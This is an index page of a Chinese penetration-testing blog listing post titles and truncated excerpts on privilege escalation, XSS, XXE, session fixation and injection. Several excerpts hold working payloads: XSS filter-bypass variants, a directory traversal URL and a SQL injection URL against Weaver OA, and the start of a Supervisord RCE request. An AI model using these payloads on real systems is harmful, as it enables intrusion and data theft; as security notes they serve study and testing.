随笔分类 -  渗透测试

上一页 1 2 3 4 下一页
windows+MYSQL+UDF提权
摘要:测试环境windows2008 如果mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下,该目录默认是不存在的,需要使用webshell找到mysql的安装目录,并在安装目录下创建lib\plugin文件夹,然后将udf.dll文件导出到该目录 如果 阅读全文
posted @ 2020-05-25 09:17 mrhonest 阅读(1591) 评论(0) 推荐(0)
权限维持分析及防御
该文被密码保护。
posted @ 2020-05-21 14:00 mrhonest 阅读(1) 评论(0) 推荐(0)
域内横向移动分析及防御
该文被密码保护。
posted @ 2020-05-21 13:59 mrhonest 阅读(2) 评论(0) 推荐(0)
域控制器安全
该文被密码保护。
posted @ 2020-05-21 13:59 mrhonest 阅读(2) 评论(0) 推荐(0)
权限提升分析及防御
该文被密码保护。
posted @ 2020-05-21 13:58 mrhonest 阅读(6) 评论(0) 推荐(0)
内网信息收集
该文被密码保护。
posted @ 2020-05-21 13:55 mrhonest 阅读(5) 评论(0) 推荐(0)
博客园存储型XSS
摘要: 阅读全文
posted @ 2020-03-27 13:53 mrhonest 阅读(234) 评论(0) 推荐(0)
xss各种绕过收集
该文被密码保护。
posted @ 2020-03-27 13:50 mrhonest 阅读(17) 评论(0) 推荐(0)
XSS中拦截alert()的绕过
摘要:```javascipt top "'ale'+'rt'" a\u006cert() alert`` top['a\u006ce'+'rt']`` ``` 阅读全文
posted @ 2020-03-16 12:20 mrhonest 阅读(3129) 评论(0) 推荐(0)
upload-labs 通关笔记
该文被密码保护。
posted @ 2020-03-12 08:49 mrhonest 阅读(1) 评论(0) 推荐(0)
mof提权原理及其过程
摘要:原理 利用了c:/windows/system32/wbem/mof/目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行。 对windows版本有所要求: 仅限windows server2008以下的版本 mof提权代码 再将命 阅读全文
posted @ 2020-02-24 11:48 mrhonest 阅读(498) 评论(0) 推荐(0)
TOMCAT-ajp-CVE-2020-1938
摘要:![](https://img2018.cnblogs.com/blog/1431916/202002/1431916-20200221203800744-86651718.png) ![](https://img2018.cnblogs.com/blog/1431916/202002/1431916-20200221203827349-1257599343.png) ![](https://im 阅读全文
posted @ 2020-02-21 20:39 mrhonest 阅读(157) 评论(0) 推荐(0)
XXE-XML外部实体注入(XML External Entity)
摘要:XXE XML外部实体注入(XML External Entity) ======= XML "XML菜鸟教程" DTD中支持单双引号,所以可以通过单双引号间隔使用作为区分嵌套实体和实体之间的关系;在实际使用中,我们通常需要再嵌套一个参数实体,%号是需要处理成 % 如下: %也可写为16进制% XX 阅读全文
posted @ 2020-01-19 17:03 mrhonest 阅读(773) 评论(0) 推荐(0)
命令注入(Command Injection)
该文被密码保护。
posted @ 2020-01-19 11:27 mrhonest 阅读(4) 评论(0) 推荐(0)
会话固定
摘要:会话固定(Session fixation)是一种诱骗受害者使用攻击者指定的会话标识(SessionID)的攻击手段。这是攻击者获取合法会话标识的最简单的方法。会话固定也可以看成是会话劫持的一种类型,原因是会话固定的攻击的主要目的同样是获得目标用户的合法会话,不过会话固定还可以是强迫受害者使用攻击者 阅读全文
posted @ 2020-01-16 14:53 mrhonest 阅读(2071) 评论(0) 推荐(1)
Linux 提权-依赖 Exp 篇
摘要:exp注: CVE 2017 1000367 "Sudo" CVE 2017 1000112 [a memory corruption due to UFO to non UFO path switch] CVE 2017 7494 "Samba Remote execution" CVE 2017 阅读全文
posted @ 2020-01-07 14:41 mrhonest 阅读(892) 评论(0) 推荐(0)
mysql报错函数
摘要:floor,updatexml,extractvalueGeometryCollection,polygon,GTID_SUBSET,multipoint,multilinestring,multipolygon,LINESTRING,exp; 待整理 procedure analyse 阅读全文
posted @ 2019-12-16 11:09 mrhonest 阅读(302) 评论(0) 推荐(0)
泛微weaver_oa filebrowser.jsp 任意目录遍历
摘要:``` url//document/imp/filebrowser.jsp?dir=/etc/ ``` 阅读全文
posted @ 2019-12-09 16:10 mrhonest 阅读(725) 评论(0) 推荐(0)
泛微oa系统com.eweaver.base.DataAction文件sql参数sql注入
摘要:``` URL/ServiceAction/com.eweaver.base.DataAction?sql=select%201,2,3,4,5,6,7,8,9,233%20from%20DUAL%20 ``` 阅读全文
posted @ 2019-12-09 16:08 mrhonest 阅读(691) 评论(0) 推荐(0)
Supervisord rce(CVE-2017-11610)
摘要:```POST /RPC2 HTTP/1.1Host: localhostAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-w... 阅读全文
posted @ 2019-12-09 15:55 mrhonest 阅读(494) 评论(0) 推荐(0)

上一页 1 2 3 4 下一页